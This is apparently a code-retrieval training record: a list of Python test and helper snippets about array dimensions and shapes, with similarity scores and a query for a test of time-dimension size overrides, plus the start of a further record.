next(iterator)\n image, label = sample['image'], sample['label']\n\n with self.subTest(name='DataShape'):\n self.assertTupleEqual(image.shape, (self._batch_size_test, 32, 32, 3))\n\n with self.subTest(name='DataType'):\n self.assertTrue(np.issubdtype(image.dtype, float))\n\n with self.subTest(name='DataValues'):\n # Normalized by stddev., expect nothing to fall outside 3 stddev.\n self.assertTrue((image >= -3.).all() and (image <= 3.).all())\n\n with self.subTest(name='LabelShape'):\n self.assertLen(label, self._batch_size_test)\n\n with self.subTest(name='LabelType'):\n self.assertTrue(np.issubdtype(label.dtype, int))\n\n with self.subTest(name='LabelValues'):\n self.assertTrue((label >= 0).all() and\n (label <= self._dataset.num_classes).all())", "def __DimSiz_restriction_incorrect_ndarray_number_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 13, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(14, 3, 3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def __DimSiz_restriction_incorrect_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (2) [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 2, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def nd_shape_checking(x, y, mvaxis, traxis):\n assert x.ndim == y.ndim\n dims = np.delete(np.arange(x.ndim), -2)\n assert all([x.shape[k] == y.shape[k] for k in dims])", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to the size of a dimension of another Numpy array [pedantic] (3) (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 'rows', 'columns', pedantic=1, add=1)\n\n RxCSObject.parameter1 = np.random.randn(4, 3, 4)\n RxCSObject.aParameter1 = np.random.randn(3, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def getNumDimensions(self):\n return len(self.di.keys())", "def n_dims(self):\n return len(self.dimensions)", "def test_ndim(self):\r\n # 'ndim' is an optional integer parameter, specifying the length\r\n # of the 'shape', passed as a keyword argument.\r\n\r\n # ndim not specified, OK\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.uniform((2,2)))\r\n\r\n # ndim specified, consistent with shape, OK\r\n random2 = RandomStreams(utt.fetch_seed())\r\n fn2 = function([], random2.uniform((2,2), ndim=2))\r\n\r\n val1 = fn()\r\n val2 = fn2()\r\n assert numpy.all(val1 == val2)\r\n\r\n # ndim specified, inconsistent with shape, should raise ValueError\r\n random3 = RandomStreams(utt.fetch_seed())\r\n self.assertRaises(ValueError, random3.uniform, (2,2), ndim=1)", "def _SetDimensions(self):\n self._size = 0\n for variable_ndarray in self._layer.get_weights():\n size = variable_ndarray.size\n self._dimensions.append((variable_ndarray.shape, size))\n self._size += size", "def test_contains_shape(self):\n dim = Dimension(None, \"uniform\", -3, 4, shape=(4, 4))\n\n with pytest.raises(NotImplementedError):\n assert dists.uniform.rvs(-3, 4, size=(4, 4)) in dim", "def testSize (self):\r\n \r\n perpixel = bytes_per_pixel [self.bih_vals [bih_BitCount]]\r\n width = self.bih_vals [bih_Width]\r\n height = self.bih_vals [bih_Height]\r\n expected = self.bih_vals [bih_SizeImage]\r\n\r\n # Rows always have multiples of 4 bytes\r\n \r\n padding = 3 - ((perpixel * width + 3) % 4)\r\n size = (width * perpixel + padding) * height\r\n\r\n if not size == expected:\r\n print \"Calculated size = %d (<> %d)\" % (size, expected)\r\n print \"***** File size error *****\"", "def _test_sampsize(t):\n return t.shape[1] != len(t.ids(axis='sample'))", "def test_check_width(self):\n r1 = Rectangle(10, 2)\n self.assertEqual(r1.width, 10)\n\n r2 = Rectangle(2, 10)\n self.assertEqual(r2.width, 2)\n\n r3 = Rectangle(5, 2, 0, 0, 12)\n self.assertEqual(r3.width, 5)", "def test_shapes(self, n_layers, n_wires, tol):\n\n shapes = qml.CVNeuralNetLayers.shape(n_layers, n_wires)\n expected = expected_shapes(n_layers, n_wires)\n\n assert np.allclose(shapes, expected, atol=tol, rtol=0)", "def __DimSiz_restriction_incorrect_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 4)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def dim(self) -> int:\n pass", "def __len__(self) -> int:\n\n return self.layout.gaDims", "def test_shape(self):\n M = simulation.StateMonitor(self.G, ['a', 'v'])\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n\n nsteps = int_r(self.t_max/self.dt)\n self.assertEqual(M.v.shape, (self.N, nsteps))\n self.assertEqual(M.a.shape, (2, nsteps))", "def test_size():\r\n for sparse_type in ('csc_matrix', 'csr_matrix'):\r\n x = getattr(theano.sparse, sparse_type)()\r\n y = getattr(scipy.sparse, sparse_type)((5, 7)).astype(config.floatX)\r\n get_size = theano.function([x], x.size)\r\n\r\n def check():\r\n assert y.size == get_size(y)\r\n # We verify that the size is correctly updated as we store more data\r\n # into the sparse matrix (including zeros).\r\n check()\r\n y[0, 0] = 1\r\n check()\r\n y[0, 1] = 0\r\n check()", "def _check_dimensions(self, a, b):\n units_a = self._get_units(a)\n units_b = self._get_units(b)\n dim_a = units_a.dimensions\n dim_b = units_b.dimensions\n if dim_a != dim_b:\n raise UnitConversionError(units_a, dim_a, units_b, dim_b)", "def test_separate_ims():\n\n df1, df2 = setup()\n\n # Test 1\n im = separate_ims(df1)\n size = df1['imdims'][0]\n assert im.size == (size[0]*2, size[1])\n\n # Test 2\n im = separate_ims(df2)\n size = df2['imdims'][0]\n assert im.size == (size[0], size[1])", "def _check_ensembles_are_same_size(p, q):\n if p.npdf != q.npdf:\n raise ValueError(\"Input ensembles should have the same number of distributions\")", "def _assertCollectionSize(self, expected_size, collection):\n actual_size = len(tf.get_collection(collection))\n if expected_size != actual_size:\n self.fail(\"Found %d items in collection %s (expected %d).\" %\n (actual_size, collection, expected_size))", "def _check_shape(input_shape):\n msg = ('Input to SpatialExpansion must be 4D with dimensions: '\n '(n_observations, n_spatial_0, n_spatial_1, n_features), '\n 'but received shape: {}'.format(input_shape))\n assert len(input_shape) == 4, msg", "def test_image_folder_datasource_size_parameter(\n ray_start_regular_shared, enable_automatic_tensor_extension_cast\n):\n root = \"example://image-folders/different-sizes\"\n ds = ray.data.read_datasource(ImageFolderDatasource(), root=root, size=(32, 32))\n\n tensors = ds.to_pandas()[\"image\"]\n assert all(tensor.shape == (32, 32, 3) for tensor in tensors)" ]
[ "0.76725674", "0.75539386", "0.74125654", "0.7359512", "0.73051524", "0.72323257", "0.7225344", "0.7185799", "0.71210706", "0.6941943", "0.68519884", "0.6851906", "0.68469083", "0.68195313", "0.6812142", "0.67658305", "0.6746414", "0.6741667", "0.6688384", "0.66588515", "0.66540855", "0.6652592", "0.6647712", "0.66447943", "0.6630445", "0.6628934", "0.6613684", "0.6611912", "0.6608618", "0.65892714", "0.6588475", "0.6569945", "0.6566038", "0.6564777", "0.6560782", "0.6548039", "0.6544226", "0.65412474", "0.65286076", "0.6528576", "0.6524179", "0.6516652", "0.65136117", "0.6507439", "0.65043724", "0.6502506", "0.6496374", "0.6496141", "0.649542", "0.64860827", "0.648127", "0.6479723", "0.6452053", "0.6439915", "0.6438422", "0.6436254", "0.6413669", "0.63907695", "0.6381488", "0.637147", "0.6368019", "0.6349676", "0.6342561", "0.6339706", "0.6330898", "0.6329612", "0.63273704", "0.6321226", "0.6318467", "0.6312691", "0.63125414", "0.6308242", "0.6296662", "0.6289862", "0.62892014", "0.6288505", "0.62833905", "0.62826365", "0.6280874", "0.62799966", "0.62764865", "0.6275759", "0.6275157", "0.62634623", "0.62608486", "0.62598836", "0.6258721", "0.6257438", "0.62539715", "0.62536025", "0.6251206", "0.62500966", "0.62441885", "0.62386644", "0.6213573", "0.62124985", "0.62063485", "0.6205541", "0.62053895", "0.62052035" ]
0.76781756
0
Test explicit overrides for the leading time dimension
def test_dimension_size_override(self, nt=100): i, j, k = dimify('i j k') a = TimeData(name='a', dimensions=(i, j, k)) one = symbol(name='one', dimensions=(i, j, k), value=1.) op = Operator(Eq(a.forward, a + one)) # Test dimension override via the buffered dimenions a.data[0] = 0. op(a=a, t=6) assert(np.allclose(a.data[1], 5.)) # Test dimension override via the parent dimenions a.data[0] = 0. op(a=a, time=5) assert(np.allclose(a.data[0], 4.))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_general_subset_invalid_time():\n pass", "def test_fix_metadata_correct_time(self):\n fixed_cube = self.fix.fix_metadata([self.cube])[0]\n time_coord = fixed_cube.coord('time')\n np.testing.assert_allclose(time_coord.points, [0, 1])\n assert time_coord.bounds is None", "def test_general_subset_time():\n pass", "def test_fix_metadata_wrong_time_no_bounds(self):\n self.cube_with_wrong_time.coord('time').bounds = None\n fixed_cube = self.fix.fix_metadata([self.cube_with_wrong_time])[0]\n time_coord = fixed_cube.coord('time')\n np.testing.assert_allclose(time_coord.points, [-711845.0, -711814.0])\n assert time_coord.bounds is None", "def _IsTimeReplot( self ):\n return True", "def test_fix_metadata_wrong_time(self):\n fixed_cube = self.fix.fix_metadata([self.cube_with_wrong_time])[0]\n time_coord = fixed_cube.coord('time')\n np.testing.assert_allclose(time_coord.points, [-711841.5, -711810.5])\n np.testing.assert_allclose(\n time_coord.bounds,\n [[-711857.0, -711826.0], [-711826.0, -711796.5]])", "def __isub__(self, *args, **kwargs):\n return _uhd_swig.time_spec_t___isub__(self, *args, **kwargs)", "def test_13_not_indexed_by_time(self):\n parsed = timeseries.parse_timeseries(data=self.meas_13,\n index_by_time=False)\n\n # In this case, we should have 'time' as a column rather than\n # the index.\n self.assertIn('time', parsed.columns)\n\n # Ensure we just have a simple range index.\n self.assertEqual(parsed.index[0], 0)\n self.assertEqual(parsed.index[-1], parsed.shape[0] - 1)", "def test_timestamp_spacing_one_missing(times):\n assert_series_equal(\n time.spacing(times[[0, 2, 3]], times.freq),\n pd.Series([True, False, True], index=times[[0, 2, 3]])\n )", "def _uses_datetimeblock(dtype: Union[np.dtype, ExtensionDtype]) -> bool:\n vtype = dtype.type\n return issubclass(vtype, np.datetime64)", "def is_temporal(axis):\n return (axis.lower() in temporal_axes)", "def test_time_field():", "def test_time_type_state_is_noon(day):\n\n assert day_time_info(day.hours_0).is_noon is False\n assert day_time_info(day.hours_1).is_noon is False\n assert day_time_info(day.hours_2).is_noon is False\n assert day_time_info(day.hours_3).is_noon is False\n assert day_time_info(day.hours_4).is_noon is False\n assert day_time_info(day.hours_5).is_noon is False\n assert day_time_info(day.hours_6).is_noon is False\n assert day_time_info(day.hours_7).is_noon is False\n assert day_time_info(day.hours_8).is_noon is False\n assert day_time_info(day.hours_9).is_noon is False\n assert day_time_info(day.hours_10).is_noon is False\n assert day_time_info(day.hours_11).is_noon is False\n assert day_time_info(day.hours_12).is_noon is True\n assert day_time_info(day.hours_13).is_noon is False\n assert day_time_info(day.hours_14).is_noon is False\n assert day_time_info(day.hours_15).is_noon is False\n assert day_time_info(day.hours_16).is_noon is False\n assert day_time_info(day.hours_17).is_noon is False\n assert day_time_info(day.hours_18).is_noon is False\n assert day_time_info(day.hours_19).is_noon is False\n assert day_time_info(day.hours_20).is_noon is False\n assert day_time_info(day.hours_21).is_noon is False\n assert day_time_info(day.hours_22).is_noon is False\n assert day_time_info(day.hours_23).is_noon is False", "def test_003_not_enough_datetimes() -> None:\n df = generate_test_data()\n df = df.head(2)\n skim(df)", "def test_as_specified(self):\n self.assertEqual(\n time_display._as_specified(\n datetime(2020, 7, 31, 23, 59, 30, 357921),\n '%Y-%m-%d %H:%M:%S'),\n '2020-07-31 23:59:30')\n self.assertEqual(\n time_display._as_specified(\n datetime(2020, 7, 31, 23, 59, 30, 357921),\n '%Y-%m-%d %H:%M:%S',\n with_msec=True),\n '2020-07-31 23:59:30.357')\n self.assertEqual(\n time_display._as_specified(\n datetime(2020, 7, 31, 23, 59, 30, 357921),\n '%Y-%m-%d %H:%M:%S',\n with_usec=True),\n '2020-07-31 23:59:30.357921')", "def inner_test(param: datetime.timedelta):\n pass", "def test_dt_preservation(self):\n dt = 0.6767335\n test_rec = rt.Recording([[[0, 1, 2]]], dt=dt)\n self.assertEqual(\n test_rec.dt,\n dt,\n 'Assigned `dt` not equal to attribute `dt`; test code probably '\n 'broken.',\n )\n self.assertEqual(\n test_rec[..., 1:].dt,\n dt,\n '`Recording.dt` attribute altered by slicing.',\n )\n self.assertEqual(\n test_rec[..., 1].dt,\n dt,\n '`dt` attribute altered by retrieving single element of `Recording`.',\n )", "def _validate_time_params(time_params):\n allowed_params = (\"Ntimes\", \"start_time\", \"integration_time\", \"time_array\")\n if time_params.get(\"time_array\", None) is not None:\n return True\n elif all(time_params.get(param, None) is not None for param in allowed_params[:-1]):\n # Technically, start_time doesn't need to be specified, since it has a\n # default setting in io.py, but that might not be set in stone.\n return True\n else:\n return False", "def test_TimeArray_convert_unit():", "def test_time(self):\r\n pass", "def has_ontime_pane(self):\n pass", "def _validate_dimensionality(self):\r\n\r\n if self.time.ndim != 1:\r\n raise ValueError(\"time array must be one-dimensional\")\r\n npoints = self.data.shape[-1]\r\n if npoints != len(self.time):\r\n raise ValueError(\"mismatch of time and data dimensions\")", "def test_training_time(self):\n self.assertIsInstance(self.one_off_training.time, datetime.time)\n self.assertEqual(self.one_off_training.time, datetime.time(9, 0))", "def check_dimension(dim, meta, trace=False):\n if dim == \"..\":\n meta[\"dimension\"] = declast.AssumedRank()\n meta[\"assumed-rank\"] = True\n else:\n meta[\"dimension\"] = declast.ExprParser(dim, trace=trace).dimension_shape()", "def test_ensure_ts_ts(self):\n self.assertEqual(ensure_ts(self.jobset2), 'imaginary')", "def test_time_type_state_types(day):\n\n assert day_time_info(day.hours_0).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_1).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_2).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_3).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_4).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_5).types == {TimeType.MORNING}\n assert day_time_info(day.hours_6).types == {TimeType.MORNING}\n assert day_time_info(day.hours_7).types == {TimeType.MORNING}\n assert day_time_info(day.hours_8).types == {TimeType.MORNING}\n assert day_time_info(day.hours_9).types == {TimeType.MORNING}\n assert day_time_info(day.hours_10).types == {TimeType.MIDMORNING}\n assert day_time_info(day.hours_11).types == {TimeType.MIDMORNING}\n assert day_time_info(day.hours_12).types == {TimeType.NOON}\n assert day_time_info(day.hours_13).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_14).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_15).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_16).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_17).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_18).types == {TimeType.EVENING}\n assert day_time_info(day.hours_19).types == {TimeType.EVENING}\n assert day_time_info(day.hours_20).types == {TimeType.EVENING}\n assert day_time_info(day.hours_21).types == {TimeType.EVENING}\n assert day_time_info(day.hours_22).types == {TimeType.EVENING}\n assert day_time_info(day.hours_23).types == {TimeType.NIGHT}", "def test_time_dicts():\n dmd = DMD()\n dmd.fit(X=sample_data_1, Y=sample_data_2)\n expected_dict = {\"dt\": 1, \"t0\": 0, \"tend\": 13}\n np.testing.assert_equal(dmd.original_time, expected_dict)\n np.testing.assert_equal(dmd.dmd_time, expected_dict)", "def test_tzaware_datetime_support(self):\r\n pk = uuid4()\r\n midpoint_utc = datetime.utcnow().replace(tzinfo=TzOffset(0))\r\n midpoint_helsinki = midpoint_utc.astimezone(TzOffset(3))\r\n\r\n # Assert pre-condition that we have the same logical point in time\r\n assert midpoint_utc.utctimetuple() == midpoint_helsinki.utctimetuple()\r\n assert midpoint_utc.timetuple() != midpoint_helsinki.timetuple()\r\n\r\n TimeUUIDQueryModel.create(\r\n partition=pk,\r\n time=columns.TimeUUID.from_datetime(midpoint_utc - timedelta(minutes=1)),\r\n data='1')\r\n\r\n TimeUUIDQueryModel.create(\r\n partition=pk,\r\n time=columns.TimeUUID.from_datetime(midpoint_utc),\r\n data='2')\r\n\r\n TimeUUIDQueryModel.create(\r\n partition=pk,\r\n time=columns.TimeUUID.from_datetime(midpoint_utc + timedelta(minutes=1)),\r\n data='3')\r\n\r\n assert ['1', '2'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time <= functions.MaxTimeUUID(midpoint_utc))]\r\n\r\n assert ['1', '2'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time <= functions.MaxTimeUUID(midpoint_helsinki))]\r\n\r\n assert ['2', '3'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time >= functions.MinTimeUUID(midpoint_utc))]\r\n\r\n assert ['2', '3'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time >= functions.MinTimeUUID(midpoint_helsinki))]", "def test_timestamp_spacing_too_frequent(times):\n assert_series_equal(\n time.spacing(times, '30min'),\n pd.Series([True] + [False] * (len(times) - 1), index=times)\n )", "def test_no_timesteps_property(self):\n expected_values = {\n 'no_timesteps': 1000,\n 'no_sweeps': 10,\n 'no_channels': 4,\n }\n test_rec = rt.Recording(\n np.zeros(\n [\n expected_values['no_channels'],\n expected_values['no_timesteps'],\n expected_values['no_sweeps'],\n ]\n ),\n dt=0.1,\n )\n self.assertEqual(\n test_rec.no_timesteps,\n expected_values['no_timesteps'],\n 'Expected {} for `no_timesteps` property; got {} instead.'.format(\n expected_values['no_timesteps'], test_rec.no_timesteps\n ),\n )", "def test_missing_report_datetime(self):\n self.assertEqual(datetime.datetime.min, self.__uft.datetime('raise'))", "def test_interval(self):\n dim = Fidelity(\"epoch\", 1, 10)\n dim.interval() == (1, 10)", "def test_ensure_ts_not_ts(self):\n self.assertEqual(ensure_ts(self.jobset1), 'opt')", "def common_axis( axis1, axis2 ):\n if hasattr( axis1, 'units' ):\n units1 = axis1.units.lower().replace(' ','_')\n if axis1.isTime():\n axis1.toRelativeTime( units1 ) #probably will change input argument\n else:\n units1 = None\n if hasattr( axis2, 'units' ):\n units2 = axis2.units.lower().replace(' ','_')\n else:\n units2 = None\n if units1!=None and units2!=None and units1 != units2:\n if axis1.isTime() and axis2.isTime():\n axis2.toRelativeTime( units1, axis1.getCalendar() ) #probably will change input argument\n else:\n print \"ERROR. common_axis does not yet support differing units\",axis1.units,\" and \",axis2.units\n return None\n if axis1.isTime() or axis2.isTime():\n if not axis2.isTime() or not axis1.isTime():\n print \"ERROR. In common_axis, one axis is time, not the other\"\n return None\n if not axis1.calendar==axis2.calendar:\n print \"ERROR. common_axis does not yet support differing calendars.\"\n if len(axis1)==1 and len(axis2)==1:\n # There's just one time value, probably from averaging over time. The time value is meaningless\n # but it would be messy to have two.\n return (axis1,[0],[0])\n\n # to do: similar checks using isLatitude and isLongitude and isLevel <<<<<<\n # Also, transfer long_name, standard_name, axis attributes if in agreement;\n # units and calendar attributes should always be transferred if present.\n # Also to do: use bounds if available\n a12 = numpy.concatenate( [ axis1.getData(), axis2.getData() ] )\n a3, a12indexina3 = numpy.unique( a12, return_inverse=True )\n #... a3 has only unique indices and is sorted (unfortunately, uniqueness is based on exact identity,\n # not to some numerical tolerance). For an i index into a12 (thus 0<=i<len(axis1)+len(axis2),\n # j is an index into a3 such that, if a12indexina3[i]==j, then a1[i]==a3[j].\n a1indexina3 = a12indexina3[0:len(axis1)]\n a2indexina3 = a12indexina3[len(axis1):len(axis1)+len(axis2)]\n\n if hasattr(axis1,'id') and hasattr(axis2,'id') and axis1.id==axis2.id :\n vid = axis1.id\n else:\n vid = None\n axis3 = cdms2.createAxis( a3, bounds=None, id=vid )\n axis3.units = units1\n return (axis3,a1indexina3,a2indexina3)", "def test_analyze_time(self):\n self.ph5validate.analyze_time()\n self.assertEqual(self.ph5validate.das_time.keys(), [('12183', 1, 500)])\n Dtime = self.ph5validate.das_time[('12183', 1, 500)]\n\n # 3 different deploy time\n self.assertEqual(len(Dtime['time_windows']), 5)\n\n # station 9001\n self.assertEqual(Dtime['time_windows'][0],\n (1550849950, 1550850034, '9001'))\n self.assertEqual(Dtime['time_windows'][1],\n (1550849950, 1550850034, '9001'))\n self.assertEqual(Dtime['time_windows'][2],\n (1550849950, 1550850034, '9001'))\n # station 9002\n self.assertEqual(Dtime['time_windows'][3],\n (1550850043, 1550850093, '9002'))\n # station 9003\n self.assertEqual(Dtime['time_windows'][4],\n (1550850125, 1550850187, '9003'))\n\n self.assertEqual(Dtime['min_deploy_time'],\n [1550849950,\n 'Data exists before deploy time: 7 seconds.'])", "def test_issue_tracked_times(self):\n pass", "def graph_has_temporal(g):\n return any(any(edge.get(p) == 'time' for p in {'argmax', 'argmin', 'type'}) or 'num' in edge for edge in g.get('edgeSet', []))", "def test_some_meet(self, initial_placement_fixture):\n assert len(ctx.cluster.influx_db.aggregate_performance()) == 0, \\\n \"Test should run on the basic model\"\n self.generic_function(above_objective=2)", "async def test_has_group_address_custom_time(self):\n xknx = XKNX()\n self.datetime = DateTime(\n xknx,\n \"TestDateTime\",\n group_address=\"1/2/3\",\n group_address_state=\"1/2/4\",\n localtime=False,\n )\n assert self.datetime.has_group_address(GroupAddress(\"1/2/3\"))\n assert self.datetime.has_group_address(GroupAddress(\"1/2/4\"))", "def is_time(self) -> bool:\n return self.times > 1", "def is_temporal(self, e):\n if e in self.temporal:\n return True", "def test_timestamp_spacing_one_timestamp(times):\n assert_series_equal(\n time.spacing(times[[0]], times.freq),\n pd.Series(True, index=[times[0]])\n )", "def test_month_starts_and_ends(self):\n # @REVIEWED\n # @todo Optimize by combine start and end tests.\n\n startCnt = 0\n endCnt = 0\n\n def test_starts(timeColName, dataType):\n global startCnt\n self.logger.log('testing {},{}'.format(timeColName, dataType))\n\n # Take every other value from the unzipped pairs.\n starts = [x for x in itertools.islice(\n zip(*self.aggregator.monthStartsAndEnds(timeColName, dataType)),\n 0, None, 2)]\n startCnt = len(starts)\n\n # Test on the flattened start values.\n self.assertLessEqual(len(filter(\n lambda x: x.time() != datetime.strptime('00:00:00',\n '%H:%M:%S').time(),\n list(itertools.chain.from_iterable(starts)))), 1)\n\n def test_ends(timeColName, dataType):\n global endCnt\n self.logger.log('testing {},{}'.format(timeColName, dataType))\n\n # Take every other value from the unzipped pairs.\n ends = [x for x in itertools.islice(\n zip(*self.aggregator.monthStartsAndEnds(timeColName, dataType)),\n 1, None, 2)]\n endCnt = len(ends)\n\n # Test on the flattened end values.\n self.assertLessEqual(len(filter(\n lambda x: x.time() != self.aggregator.incrementEndpoint(\n datetime.strptime('23:59:59', '%H:%M:%S')).time(),\n list(itertools.chain.from_iterable(ends)))), 1)\n\n for myType in ['weather', 'egauge', 'circuit', 'irradiance']:\n if myType == 'egauge':\n test_starts('datetime', myType)\n test_ends('datetime', myType)\n else:\n test_starts('timestamp', myType)\n test_ends('timestamp', myType)\n self.assertEquals(startCnt, endCnt)", "def test_alternate_spatial_axes(conv1d_placeholder, output_size, width_axis):\n width_axis.name = \"time\"\n assert len(conv1d_placeholder.axes.find_by_name(\"time\")) == 1\n\n conv_layer = Convolution((3, output_size), lambda x: 1)\n with pytest.raises(IncompatibleAxesError):\n conv_layer(conv1d_placeholder)\n # As a dictionary\n output = conv_layer(conv1d_placeholder, spatial_axes={\"W\": \"time\"})\n assert output.axes == conv1d_placeholder.axes\n # As a tuple\n output = conv_layer(conv1d_placeholder, spatial_axes=(\"D\", \"H\", \"time\"))\n assert output.axes == conv1d_placeholder.axes", "def test_plt_v3offset_time():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_v3offset_time()\n\n assert bokeh_plot_type == type(result)", "def test_dim_None(a, b, metrics):\n metric, _metric = metrics\n if metric in [effective_sample_size, spearman_r_eff_p_value, pearson_r_eff_p_value]:\n with pytest.raises(ValueError) as excinfo:\n metric(a, b, dim=None)\n assert (\n \"Effective sample size should only be applied to a singular time dimension.\"\n in str(excinfo.value)\n )\n else:\n metric, _metric = metrics\n res = metric(a, b, dim=None)\n assert len(res.dims) == 0, print(res.dims)", "def test_map_args_include_time():\n pass", "def test_get_integration_time_shape():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n baseline_array = np.array(list(set(test_uv.baseline_array)))\n inttime_array = utils.get_integration_time(test_uv, reds=baseline_array)\n test_shape = (test_uv.Nbls, test_uv.Ntimes)\n assert test_shape == inttime_array.shape", "def test_duration_argument_skipped(self):\n d = DurationMixin()\n self.assertEqual(d.duration, 0)", "def test_contains_bounds(self):\n dim = Dimension(\"yolo\", \"uniform\", -3, 4)\n with pytest.raises(NotImplementedError):\n assert -3 in dim", "def test_all_repetition_frequency_have_timedelta(self):\n for value in EventRepetitionFrequency:\n if value is EventRepetitionFrequency.not_repeated:\n self.assertIsNone(value.to_timedelta())\n else:\n self.assertIsNotNone(value.to_timedelta())", "def test_index_at_20101206():\r\n A = np.random.standard_normal(40)\r\n #negative t0\r\n TS_A = ts.TimeSeries(A, t0=-20, sampling_interval=2)\r\n npt.assert_equal(TS_A.time.index_at(TS_A.time), np.arange(40))\r\n #positive t0\r\n TS_A = ts.TimeSeries(A, t0=15, sampling_interval=2)\r\n npt.assert_equal(TS_A.time.index_at(TS_A.time), np.arange(40))\r\n #no t0\r\n TS_A = ts.TimeSeries(A, sampling_interval=2)\r\n npt.assert_equal(TS_A.time.index_at(TS_A.time), np.arange(40))", "def test_plot_ts_multidim(kwargs):\n nchains = 4\n ndraws = 500\n ndim1 = 5\n ndim2 = 7\n data = {\n \"y\": np.random.normal(size=(ndim1, ndim2)),\n \"z\": np.random.normal(size=(ndim1, ndim2)),\n }\n\n posterior_predictive = {\n \"y\": np.random.randn(nchains, ndraws, ndim1, ndim2),\n \"z\": np.random.randn(nchains, ndraws, ndim1, ndim2),\n }\n\n const_data = {\"x\": np.arange(1, 6), \"x_pred\": np.arange(5, 10)}\n\n idata = from_dict(\n observed_data=data,\n posterior_predictive=posterior_predictive,\n constant_data=const_data,\n dims={\n \"y\": [\"dim1\", \"dim2\"],\n \"z\": [\"holdout_dim1\", \"holdout_dim2\"],\n },\n coords={\n \"dim1\": range(ndim1),\n \"dim2\": range(ndim2),\n \"holdout_dim1\": range(ndim1 - 1, ndim1 + 4),\n \"holdout_dim2\": range(ndim2 - 1, ndim2 + 6),\n },\n )\n\n ax = plot_ts(idata=idata, y=\"y\", plot_dim=\"dim1\", **kwargs)\n assert np.all(ax)", "def isDefaultedAt(self, time):\n return time > self.getDefaultTime()", "def test_contains(self):\n dim = Fidelity(\"epoch\", 1, 10)\n\n assert 0 not in dim\n assert 1 in dim\n assert 5 in dim\n assert 10 in dim\n assert 20 not in dim", "def test_cast(self):\n dim = Fidelity(\"epoch\", 1, 10)\n with pytest.raises(NotImplementedError):\n dim.cast()", "def test_UniformTime_repr():", "def test_custom_time(self):\n interval = 0.5\n M = simulation.StateMonitor(self.G, 'v', interval=interval)\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n self.assertTrue(np.allclose(M.t, np.arange(0, self.t_max, interval)))", "def testNoneCanAppearInData(self):\n # Buffer makes comparison difficult because min/max aren't A & 9\n self.chart.auto_scale.buffer = 0\n self.AddToChart(self.chart, [1, None, 3])\n self.assertEqual(self.Param('chd'), 's:A_9')", "def _checkDT(self):\r\n dt = np.diff(self.tsec)\r\n \r\n dt_unique = np.unique(dt)\r\n \r\n if np.size(dt_unique) == 1:\r\n self.isequal = True\r\n else:\r\n self.isequal = False\r\n \r\n try:\r\n self.dt = dt[1]\r\n except:\r\n self.dt = 0.0", "def test_track_lv_only():\n track = np.arange(20).reshape(10,2)\n track2 = np.zeros((10,6))\n track2[:,0] = track[:,0]\n track2[:,2] = track[:,1]\n spiral_arm = survey.get_spiral_slice(track = track)\n spiral_arm2 = survey.get_spiral_slice(track = track2)\n\n assert np.allclose(spiral_arm[\"INTEN\"], spiral_arm2[\"INTEN\"], equal_nan = True)", "def test_default_axis_nxdata(self, nexus_base):\n assert isinstance(nexus_base.default_axis, np.ndarray)", "def test_timestamp_spacing_date_range(times):\n assert_series_equal(\n 